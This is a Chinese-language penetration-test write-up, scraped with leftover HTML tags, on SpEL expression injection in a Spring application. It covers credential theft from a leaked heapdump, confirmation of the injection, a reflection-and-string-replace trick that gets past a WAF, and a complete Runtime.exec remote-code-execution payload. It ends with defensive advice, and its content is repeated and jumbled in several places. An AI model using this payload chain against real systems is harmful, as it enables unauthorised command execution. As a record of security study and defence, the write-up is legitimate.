SPEL表达式注入漏洞分析与利用<\/h1>

一、漏洞背景<\/h2>
SPEL (Spring Expression Language) 是Spring框架中的一种表达式语言，用于在运行时查询和操作对象图。当应用程序未正确处理用户输入的SPEL表达式时，可能导致远程代码执行(RCE)漏洞。<\/p>

二、漏洞发现过程<\/h2>

1. 信息收集阶段<\/h3>

对目标站点进行常规信息收集<\/li>
尝试弱密码攻击未果<\/li>
前台接口无敏感信息<\/li>

目录扫描发现heapdump文件泄露<\/li> <\/ul>

2. 凭据获取<\/h3>

通过heapdump文件获取管理员密码<\/li>

使用密码爆破获得管理员账号(用户名:manager)<\/li> <\/ul>

3. 接口分析<\/h3>

进入内部界面后发现70多个接口<\/li>
通过历史请求包分析发现可疑接口<\/li>

关键参数名为

expr<\/code>，值为#ticket<\/code>，提示可能存在表达式注入<\/li>
<\/ul>
三、表达式语言对比<\/h2>



特性<\/th>
SPEL<\/th>
EL表达式<\/th>
OGNL<\/th>
MVEL<\/th>
<\/tr>
<\/thead>


变量引用<\/td>
#variable<\/code><\/td>
${var}<\/code>或#{var}<\/code><\/td>
直接使用变量名<\/td>
直接使用变量名<\/td>
<\/tr>

类调用<\/td>
T(java.lang.Math)<\/code><\/td>
不支持<\/td>
@java.lang.Math@max()<\/code><\/td>
@java.lang.Math@max()<\/code><\/td>
<\/tr>

对象创建<\/td>
new java.lang.String()<\/code><\/td>
不支持<\/td>
支持<\/td>
支持<\/td>
<\/tr>

方法调用<\/td>
#obj.getName()<\/code><\/td>
${fn:length(list)}<\/code><\/td>
user.getName()<\/code><\/td>
user.getName()<\/code><\/td>
<\/tr>

集合访问<\/td>
#list[0]<\/code><\/td>
${list[0]}<\/code><\/td>
list[0]<\/code><\/td>
list[0]<\/code><\/td>
<\/tr>

运算符<\/td>
eq<\/code>, ne<\/code>等<\/td>
==<\/code>, !=<\/code>等<\/td>
==<\/code>, !=<\/code>等<\/td>
==<\/code>, !=<\/code>等<\/td>
<\/tr>
<\/tbody>
<\/table>
四、漏洞验证与利用<\/h2>
1. 初步验证<\/h3>

尝试基本表达式：expr=#{(1+8)}<\/code>，回显9，确认存在表达式注入<\/li>
尝试直接实例化对象被WAF拦截<\/li>
<\/ul>
2. 绕过WAF限制<\/h3>

直接使用new<\/code>或T()<\/code>被过滤<\/li>
通过反射方式绕过：
''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. 完整利用链构造<\/h3>

获取Runtime类：
''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>suntime<\/span>'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>))<\/span>
<\/span><\/span><\/code><\/pre><\/li>
获取getRuntime方法：
.<\/span>getMethod<\/span>(<\/span>'<\/span>getsuntime'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>))<\/span>
<\/span><\/span><\/code><\/pre><\/li>
调用方法获取Runtime实例：
.<\/span>invoke<\/span>(<\/span>null<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
执行命令：
.<\/span>exec<\/span>(<\/span>'<\/span>command'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 最终Payload<\/h3>
''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>suntime<\/span>'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>)).<\/span>getMethod<\/span>(<\/span>'<\/span>getsuntime'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>)).<\/span>invoke<\/span>(<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>'<\/span>ping -<\/span>c 4<\/span> 127.0.0.1<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>五、防御措施<\/h2>


输入验证<\/strong>：<\/p>

对用户输入的表达式进行严格过滤<\/li>
使用白名单机制限制允许的表达式内容<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

使用SimpleEvaluationContext<\/code>替代StandardEvaluationContext<\/code><\/li>
禁用危险的SPEL特性<\/li>
<\/ul>
<\/li>

代码审查<\/strong>：<\/p>

检查所有使用SpelExpressionParser<\/code>的代码<\/li>
确保不将用户输入直接传递给表达式解析器<\/li>
<\/ul>
<\/li>

WAF规则<\/strong>：<\/p>

拦截包含危险关键词的请求(如Runtime<\/code>, ProcessBuilder<\/code>, getClass<\/code>等)<\/li>
<\/ul>
<\/li>
<\/ol>
六、总结<\/h2>
本次渗透过程展示了从信息收集到漏洞利用的完整思路：<\/p>

通过heapdump泄露获取凭据<\/li>
分析接口发现潜在注入点<\/li>
绕过WAF限制实现RCE<\/li>
关键点在于对Java反射机制和SPEL特性的深入理解<\/li>
<\/ol>
漏洞利用的核心在于：<\/p>

通过字符串操作绕过关键字过滤<\/li>
利用反射机制获取危险类和方法<\/li>
构造完整的调用链实现命令执行<\/li>
<\/ul>
这种漏洞的危害性极高，开发人员应严格避免将用户输入直接作为表达式解析。<\/p>

特性<\/th>	SPEL<\/th>	EL表达式<\/th>	OGNL<\/th>	MVEL<\/th> <\/tr> <\/thead>
变量引用<\/td>	`#variable<\/code><\/td>`	`${var}<\/code>或#{var}<\/code><\/td>`	直接使用变量名<\/td>	直接使用变量名<\/td> <\/tr>
类调用<\/td>	`T(java.lang.Math)<\/code><\/td>`	不支持<\/td>	`@java.lang.Math@max()<\/code><\/td>`	`@java.lang.Math@max()<\/code><\/td> <\/tr>`
对象创建<\/td>	`new java.lang.String()<\/code><\/td>`	不支持<\/td>	支持<\/td>	支持<\/td> <\/tr>
方法调用<\/td>	`#obj.getName()<\/code><\/td>`	`${fn:length(list)}<\/code><\/td>`	`user.getName()<\/code><\/td>`	`user.getName()<\/code><\/td> <\/tr>`
集合访问<\/td>	`#list[0]<\/code><\/td>`	`${list[0]}<\/code><\/td>`	`list[0]<\/code><\/td>`	`list[0]<\/code><\/td> <\/tr>`
运算符<\/td>	`eq<\/code>, ne<\/code>等<\/td>`	`==<\/code>, !=<\/code>等<\/td>`	`==<\/code>, !=<\/code>等<\/td>`	==<\/code>, !=<\/code>等<\/td> <\/tr> <\/tbody> <\/table> 四、漏洞验证与利用<\/h2> 1. 初步验证<\/h3> 尝试基本表达式：expr=#{(1+8)}<\/code>，回显9，确认存在表达式注入<\/li> 尝试直接实例化对象被WAF拦截<\/li> <\/ul> 2. 绕过WAF限制<\/h3> 直接使用new<\/code>或T()<\/code>被过滤<\/li> 通过反射方式绕过： ''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>)<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. 完整利用链构造<\/h3> 获取Runtime类： ''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>suntime<\/span>'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>))<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取getRuntime方法： .<\/span>getMethod<\/span>(<\/span>'<\/span>getsuntime'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>))<\/span> <\/span><\/span><\/code><\/pre><\/li> 调用方法获取Runtime实例： .<\/span>invoke<\/span>(<\/span>null<\/span>)<\/span> <\/span><\/span><\/code><\/pre><\/li> 执行命令： .<\/span>exec<\/span>(<\/span>'<\/span>command'<\/span>)<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 最终Payload<\/h3> ''<\/span>.<\/span>class<\/span>.<\/span>getSuperclass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>suntime<\/span>'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>)).<\/span>getMethod<\/span>(<\/span>'<\/span>getsuntime'<\/span>.<\/span>replace<\/span>(<\/span>'s'<\/span>,<\/span>'R'<\/span>)).<\/span>invoke<\/span>(<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>'<\/span>ping -<\/span>c 4<\/span> 127.0.0.1<\/span>'<\/span>)<\/span> <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 输入验证<\/strong>：<\/p> 对用户输入的表达式进行严格过滤<\/li> 使用白名单机制限制允许的表达式内容<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 使用SimpleEvaluationContext<\/code>替代StandardEvaluationContext<\/code><\/li> 禁用危险的SPEL特性<\/li> <\/ul> <\/li> 代码审查<\/strong>：<\/p> 检查所有使用SpelExpressionParser<\/code>的代码<\/li> 确保不将用户输入直接传递给表达式解析器<\/li> <\/ul> <\/li> WAF规则<\/strong>：<\/p> 拦截包含危险关键词的请求(如Runtime<\/code>, ProcessBuilder<\/code>, getClass<\/code>等)<\/li> <\/ul> <\/li> <\/ol> 六、总结<\/h2> 本次渗透过程展示了从信息收集到漏洞利用的完整思路：<\/p> 通过heapdump泄露获取凭据<\/li> 分析接口发现潜在注入点<\/li> 绕过WAF限制实现RCE<\/li> 关键点在于对Java反射机制和SPEL特性的深入理解<\/li> <\/ol> 漏洞利用的核心在于：<\/p> 通过字符串操作绕过关键字过滤<\/li> 利用反射机制获取危险类和方法<\/li> 构造完整的调用链实现命令执行<\/li> <\/ul> 这种漏洞的危害性极高，开发人员应严格避免将用户输入直接作为表达式解析。<\/p>

SPEL表达式注入漏洞分析与利用<\/h1>

一、漏洞背景<\/h2> SPEL (Spring Expression Language) 是Spring框架中的一种表达式语言，用于在运行时查询和操作对象图。当应用程序未正确处理用户输入的SPEL表达式时，可能导致远程代码执行(RCE)漏洞。<\/p>

二、漏洞发现过程<\/h2>

四、漏洞验证与利用<\/h2>

一、漏洞背景<\/h2>
SPEL (Spring Expression Language) 是Spring框架中的一种表达式语言，用于在运行时查询和操作对象图。当应用程序未正确处理用户输入的SPEL表达式时，可能导致远程代码执行(RCE)漏洞。<\/p>